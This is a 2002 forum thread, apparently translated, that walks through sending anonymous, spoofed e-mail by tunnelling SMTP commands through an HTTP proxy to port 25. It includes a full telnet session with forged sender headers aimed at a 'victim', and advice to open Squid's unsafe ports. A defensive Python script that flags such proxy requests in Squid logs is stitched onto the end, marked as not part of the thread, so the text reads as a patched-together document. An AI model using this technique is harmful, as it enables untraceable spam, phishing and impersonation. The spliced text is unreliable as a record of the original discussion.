Old 11.09.2002, 19:58   #1
dolphin
Anonymous mail via http proxy server

I recently discovered a way to send completely anonymous e-mail, that is, without the sender's IP being recorded, through an HTTP proxy server (tested on squid). The sender's IP will be the proxy server's IP. If the proxy keeps no logs, it is impossible to trace the sender.

Here is what you actually need to do:

~$ telnet some.proxy.server.net 3128
Connected to some.proxy.server.net (127.128.129.1).
Escape character is '^]'.
POST http://some.smtp.server.net:25/ HTTP/1.0
Content-length: 4096

helo gago
mail from: [email protected]
rcpt to: [email protected]
data
From: gago<[email protected]>
To: victim<[email protected]>
Reply-To: "Bill Gates"<[email protected]>
Subject: Have fun



This letter will be sent anonymously!

blah-blah-blah....


.


^]

telnet> q
Connection closed.

-----------------------------------

where:

some.proxy.server.net - the proxy through which the message will be sent

some.smtp.server.net - the SMTP server that, for example, serves [email protected], or any SMTP server that allows relaying.

[email protected] - the sender's address

[email protected] - the recipient's address

Recommendations:

Pause after "Content-length:" so that the SMTP server has time to complain about the HTTP headers it does not understand.

4096 - the number of bytes in the message, including headers; it must at least exceed the actual number of bytes.

Besides the headers listed, after "data" you can include any mail headers, or use none at all.

I think it would not be hard to write a script or program that sends mail this way.
__________________
[ que fors aus ne le sot riens nee ]
Old 11.09.2002, 20:39   #2
Guest

With a properly configured squid that forwards only HTTP and FTP, the following happens..
==============================================
Napalm:~$ telnet 192.168.65.1 3128
Trying 192.168.65.1...
Connected to 192.168.65.1.
Escape character is '^]'.
POST http://napalm.never.land.am:25/ HTTP/1.0
Content-length: 4096

HTTP/1.0 403 Forbidden
Server: Squid/2.4.STABLE4
Mime-Version: 1.0
Date: Wed, 11 Sep 2002 10:28:10 GMT
Content-Type: text/html
Content-Length: 771
Expires: Wed, 11 Sep 2002 10:28:10 GMT
X-Squid-Error: ERR_ACCESS_DENIED 0
X-Cache: MISS from Proxy.Never.Land.AM
Proxy-Connection: close
ERROR: The requested URL could not be retrieved
<H1>ERROR</H1>
<H2>The requested URL could not be retrieved</H2>
<HR>
<P>
While trying to retrieve the URL:
<A HREF="http://napalm.never.land.am:25/">http://napalm.never.land.am:25/</A>
<P>
The following error was encountered:
<UL>
<LI>
<STRONG>
Access Denied.
</STRONG>
<P>

==============================================

But overall, it's a great idea!
Good job!
Old 11.09.2002, 20:59   #3
dolphin

stealth <<

Hm.. your proxy complained not about the request itself but about the IP it was contacted from. It would have reacted that way to any request. Check http_allow in squid.conf
Old 11.09.2002, 22:30   #4
VX

Quote:
Originally posted by DolphiN:
stealth <<

Hm.. your proxy complained not about the request itself but about the IP it was contacted from. It would have reacted that way to any request. Check http_allow in squid.conf
Dolphin, squid has deny !SAFE_PORTS written in it, that's it.. ))
Old 12.09.2002, 03:06   #5
dolphin

vx << and how do you know?

all << in short, this thing has been tested and works on proxy servers that a) let you connect to them, and b) let you make requests to the SMTP servers you need and to their port 25
Old 12.09.2002, 07:08   #6
Guest

Dolph, if you noticed, of course, the request went to a private IP address, so logically the request also came from a private one ..
Did you really think I had blocked access for my own internal network???
))
Old 12.09.2002, 15:32   #7
dolphin

vx >> "Dolphin, squid has deny !SAFE_PORTS written in it, that's it.. ))"

stealth << I don't know, maybe you did block it
But actually vx is right, your proxy doesn't allow connecting to non-standard HTTP ports, so open up access to !SAFE_PORTS and go ahead
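A defender's view of the Safe_ports discussion above, as an added example that is not part of the thread: a Python check over Squid access.log records that reports requests aimed at ports outside an allowlist and whether the proxy denied or forwarded them. The log lines are constructed, and the SAFE_PORTS and MAIL_PORTS sets are assumptions to adapt to the proxy's own ACL.

```python
from urllib.parse import urlsplit

# Assumption: ports this proxy is meant to reach (FTP, HTTP, HTTPS only).
SAFE_PORTS = {21, 80, 443}
MAIL_PORTS = {25, 465, 587}
DEFAULT_PORT = {"http": 80, "https": 443, "ftp": 21}

# Constructed sample lines in Squid's native access.log layout:
# time elapsed client result/status bytes method URL ident hierarchy type
SAMPLE_LOG = """\
1031740090.101    45 192.168.65.7 TCP_DENIED/403 1083 POST http://napalm.never.land.am:25/ - NONE/- text/html
1031740121.554   210 192.168.65.9 TCP_MISS/200 5120 GET http://www.example.org/index.html - DIRECT/192.0.2.10 text/html
1031740180.870 30012 192.168.65.7 TCP_MISS/000 0 POST http://mail.example.net:25/ - DIRECT/192.0.2.25 -
1031740233.002   120 192.168.65.4 TCP_MISS/200 3300 CONNECT secure.example.org:443 - DIRECT/192.0.2.44 -
"""

def destination(method, url):
    """Return (host, port) the proxy was asked to reach."""
    if method == "CONNECT":            # CONNECT logs a bare host:port
        host, _, port = url.rpartition(":")
        return host, int(port)
    parts = urlsplit(url)
    return parts.hostname, parts.port or DEFAULT_PORT.get(parts.scheme, 0)

def unsafe_port_requests(log_text):
    """Return one finding per request aimed at a port outside SAFE_PORTS."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue                   # not a native-format record
        client, result, method, url = fields[2], fields[3], fields[5], fields[6]
        try:
            host, port = destination(method, url)
        except ValueError:
            continue                   # malformed port, skip the record
        if port in SAFE_PORTS:
            continue
        findings.append({
            "client": client, "method": method, "host": host, "port": port,
            "mail_port": port in MAIL_PORTS,
            # TCP_DENIED means the ACL stopped it; anything else was forwarded
            "forwarded": not result.startswith("TCP_DENIED"),
        })
    return findings

if __name__ == "__main__":
    for f in unsafe_port_requests(SAMPLE_LOG):
        print(f)
```

A finding with "forwarded" set to True on a mail port means the proxy's port ACL let the request through and the configuration needs review.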
Old 12.09.2002, 16:04   #8

Moderator: The message was deleted for being off-topic